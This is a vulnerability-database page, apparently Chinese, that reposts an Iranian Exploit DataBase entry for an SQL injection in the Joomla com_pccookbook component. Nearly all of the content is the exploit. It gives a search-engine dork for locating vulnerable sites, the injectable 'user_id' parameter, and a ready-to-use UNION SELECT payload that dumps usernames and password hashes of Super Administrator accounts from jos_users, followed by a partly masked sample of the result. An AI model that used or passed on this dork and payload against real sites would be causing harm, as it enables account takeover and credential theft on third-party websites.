Joomla com_pccookbook Components Sql Injection vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044519 漏洞类型
发布时间 2013-08-29 更新时间 2013-08-29
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013080234
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#################################

#                        Iranian Exploit DataBase

#                             Www.iedb.Ir

#                           www.iedb.ir/acc

#################################

# Exploit Title : joomla com_pccookbook Components Sql Injection vulnerability

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Home : http://Www.iedb.Ir   -   www.iedb.ir/acc

# Software Link : http://www.joomla.org

# Security Risk : High

# Tested on : Linux

# Dork : inurl:index.php?option=com_pccookbook

#################################
Exploit :

# http://www.Site.com/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=[Sql]

# Dem0 :

# http://www.XXXX.com/bp/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999+UNION+SELECT+concat%280x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e%29+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--

# Recipes of user:  Xang:8XXc2XXXXXXX :Super Administrator

#################################

# Exploit Archive : http://iedb.ir/exploits-110.html

#################################